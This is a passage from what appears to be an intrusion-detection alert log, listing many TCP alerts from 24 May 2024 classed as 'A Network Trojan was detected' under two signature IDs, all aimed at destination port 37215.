              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482220
              SID:2835222
              Source Port:54602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.676318
              SID:2829579
              Source Port:35726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802064
              SID:2835222
              Source Port:56610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245878
              SID:2829579
              Source Port:60756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189524
              SID:2829579
              Source Port:50344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.585156
              SID:2835222
              Source Port:36980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.600241
              SID:2835222
              Source Port:36706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.247697
              SID:2835222
              Source Port:55824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.247795
              SID:2835222
              Source Port:35608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.974286
              SID:2835222
              Source Port:37924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.921118
              SID:2829579
              Source Port:35394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860352
              SID:2835222
              Source Port:60226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598127
              SID:2835222
              Source Port:41830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661964
              SID:2829579
              Source Port:40214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246589
              SID:2835222
              Source Port:52214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545704
              SID:2829579
              Source Port:60248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858318
              SID:2829579
              Source Port:41996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988610
              SID:2829579
              Source Port:36650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579413
              SID:2835222
              Source Port:52936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625716
              SID:2835222
              Source Port:52656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.264714
              SID:2835222
              Source Port:49478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.108676
              SID:2835222
              Source Port:54074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062275
              SID:2835222
              Source Port:36532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.741811
              SID:2829579
              Source Port:40420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.594626
              SID:2829579
              Source Port:52978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536385
              SID:2829579
              Source Port:54434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596070
              SID:2829579
              Source Port:60792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.166227
              SID:2829579
              Source Port:38392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.599224
              SID:2835222
              Source Port:52890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.430596
              SID:2835222
              Source Port:57240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.774337
              SID:2829579
              Source Port:46680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.529799
              SID:2835222
              Source Port:46442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118461
              SID:2835222
              Source Port:59554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663628
              SID:2829579
              Source Port:35618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988821
              SID:2829579
              Source Port:35322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.118923
              SID:2835222
              Source Port:46704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.921216
              SID:2835222
              Source Port:37902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.967419
              SID:2835222
              Source Port:47262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.078089
              SID:2829579
              Source Port:57930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329969
              SID:2835222
              Source Port:35888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.065696
              SID:2835222
              Source Port:35046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395158
              SID:2829579
              Source Port:51030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116294
              SID:2829579
              Source Port:56354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574049
              SID:2835222
              Source Port:49102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726094
              SID:2835222
              Source Port:55622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.535951
              SID:2835222
              Source Port:35020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.283032
              SID:2835222
              Source Port:54504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.602530
              SID:2835222
              Source Port:56314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856789
              SID:2835222
              Source Port:36762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797810
              SID:2835222
              Source Port:38750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150660
              SID:2829579
              Source Port:53354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727332
              SID:2835222
              Source Port:59908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100833
              SID:2835222
              Source Port:35076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857870
              SID:2829579
              Source Port:36042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186958
              SID:2835222
              Source Port:37914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204305
              SID:2835222
              Source Port:48194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.409255
              SID:2829579
              Source Port:36866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.199830
              SID:2835222
              Source Port:51186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535213
              SID:2829579
              Source Port:45414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538050
              SID:2829579
              Source Port:38866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.197455
              SID:2829579
              Source Port:57920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153247
              SID:2835222
              Source Port:47380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.543508
              SID:2835222
              Source Port:45718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284800
              SID:2829579
              Source Port:47886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.067939
              SID:2829579
              Source Port:45238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573186
              SID:2835222
              Source Port:46966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.589441
              SID:2829579
              Source Port:39358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.457803
              SID:2829579
              Source Port:46616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.149007
              SID:2835222
              Source Port:43234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576481
              SID:2835222
              Source Port:36250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.127392
              SID:2829579
              Source Port:43986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693403
              SID:2835222
              Source Port:44530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.480601
              SID:2829579
              Source Port:38200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522302
              SID:2835222
              Source Port:34354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118360
              SID:2835222
              Source Port:45100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920474
              SID:2835222
              Source Port:60114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.544213
              SID:2835222
              Source Port:58260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.428862
              SID:2835222
              Source Port:52210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.117355
              SID:2829579
              Source Port:53580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.871941
              SID:2835222
              Source Port:52334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575080
              SID:2835222
              Source Port:55064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308723
              SID:2829579
              Source Port:47870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505234
              SID:2835222
              Source Port:49416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.702594
              SID:2835222
              Source Port:51746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477293
              SID:2835222
              Source Port:60918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411472
              SID:2835222
              Source Port:56522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.193875
              SID:2835222
              Source Port:36066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.419009
              SID:2835222
              Source Port:50314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.591578
              SID:2829579
              Source Port:50524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.378049
              SID:2835222
              Source Port:37926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154085
              SID:2829579
              Source Port:47626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062518
              SID:2835222
              Source Port:51246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.404657
              SID:2835222
              Source Port:48610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044629
              SID:2835222
              Source Port:48160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057615
              SID:2829579
              Source Port:46218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.250904
              SID:2829579
              Source Port:51122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.501689
              SID:2835222
              Source Port:48608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662632
              SID:2829579
              Source Port:56262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.109275
              SID:2829579
              Source Port:44412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.248861
              SID:2829579
              Source Port:49996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727088
              SID:2829579
              Source Port:51376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.201154
              SID:2835222
              Source Port:60930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.537852
              SID:2835222
              Source Port:38462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878067
              SID:2835222
              Source Port:55300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365196
              SID:2829579
              Source Port:32918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099814
              SID:2829579
              Source Port:49246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598165
              SID:2835222
              Source Port:50718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.065820
              SID:2829579
              Source Port:48080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189030
              SID:2829579
              Source Port:51004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575203
              SID:2835222
              Source Port:35704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.207720
              SID:2829579
              Source Port:47672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100724
              SID:2835222
              Source Port:56196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040498
              SID:2829579
              Source Port:52564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.698650
              SID:2835222
              Source Port:48878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538186
              SID:2835222
              Source Port:51060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234400
              SID:2835222
              Source Port:50918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.403028
              SID:2835222
              Source Port:58758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504465
              SID:2829579
              Source Port:43072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.112718
              SID:2829579
              Source Port:51858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.700866
              SID:2829579
              Source Port:53040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.970604
              SID:2829579
              Source Port:38514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.441181
              SID:2835222
              Source Port:46952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482096
              SID:2829579
              Source Port:37968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637727
              SID:2835222
              Source Port:38572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860121
              SID:2835222
              Source Port:35682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.163404
              SID:2829579
              Source Port:49532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.630773
              SID:2835222
              Source Port:52092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.483177
              SID:2829579
              Source Port:53268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695080
              SID:2829579
              Source Port:59784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.885103
              SID:2829579
              Source Port:48912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361273
              SID:2829579
              Source Port:46010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.125459
              SID:2829579
              Source Port:55342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726065
              SID:2835222
              Source Port:46578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103386
              SID:2829579
              Source Port:58782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148819
              SID:2829579
              Source Port:44322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.702653
              SID:2829579
              Source Port:45666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.492490
              SID:2829579
              Source Port:60396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537626
              SID:2835222
              Source Port:46884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.198027
              SID:2829579
              Source Port:58218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636571
              SID:2835222
              Source Port:39066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639475
              SID:2829579
              Source Port:40056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477277
              SID:2829579
              Source Port:38098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.435324
              SID:2829579
              Source Port:34184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634797
              SID:2829579
              Source Port:57338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150879
              SID:2829579
              Source Port:56602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.681060
              SID:2829579
              Source Port:45248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882760
              SID:2829579
              Source Port:41176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.108636
              SID:2835222
              Source Port:33598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432443
              SID:2829579
              Source Port:52014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.431464
              SID:2829579
              Source Port:59644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802248
              SID:2835222
              Source Port:39402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578026
              SID:2835222
              Source Port:46676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101616
              SID:2829579
              Source Port:43026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664464
              SID:2835222
              Source Port:39110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596476
              SID:2835222
              Source Port:59300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397254
              SID:2835222
              Source Port:48972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.821171
              SID:2835222
              Source Port:53446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.681420
              SID:2835222
              Source Port:58914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517162
              SID:2835222
              Source Port:53606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396185
              SID:2829579
              Source Port:53836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.289228
              SID:2829579
              Source Port:40368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397916
              SID:2835222
              Source Port:38172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878088
              SID:2829579
              Source Port:49798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623317
              SID:2829579
              Source Port:59296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637751
              SID:2835222
              Source Port:44240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151019
              SID:2829579
              Source Port:41784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574658
              SID:2829579
              Source Port:36900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102486
              SID:2829579
              Source Port:56630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.398242
              SID:2835222
              Source Port:54784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474718
              SID:2835222
              Source Port:39750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.705384
              SID:2835222
              Source Port:54380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396176
              SID:2835222
              Source Port:54266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.375132
              SID:2835222
              Source Port:42394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575302
              SID:2829579
              Source Port:46184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.546982
              SID:2835222
              Source Port:34120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494763
              SID:2835222
              Source Port:51558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.604804
              SID:2835222
              Source Port:52002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.928737
              SID:2829579
              Source Port:56468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.063828
              SID:2829579
              Source Port:49230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099941
              SID:2835222
              Source Port:54092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270430
              SID:2835222
              Source Port:38420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638724
              SID:2829579
              Source Port:56836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.302874
              SID:2829579
              Source Port:56790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.804684
              SID:2829579
              Source Port:47648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245247
              SID:2835222
              Source Port:54212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.113530
              SID:2835222
              Source Port:45210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.694618
              SID:2829579
              Source Port:37316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343632
              SID:2835222
              Source Port:42572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.698370
              SID:2829579
              Source Port:53256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.432227
              SID:2835222
              Source Port:56698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538261
              SID:2835222
              Source Port:34104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575167
              SID:2835222
              Source Port:38670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313246
              SID:2829579
              Source Port:41606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923270
              SID:2835222
              Source Port:51908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.374110
              SID:2835222
              Source Port:41948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926351
              SID:2829579
              Source Port:34216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856961
              SID:2835222
              Source Port:55326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
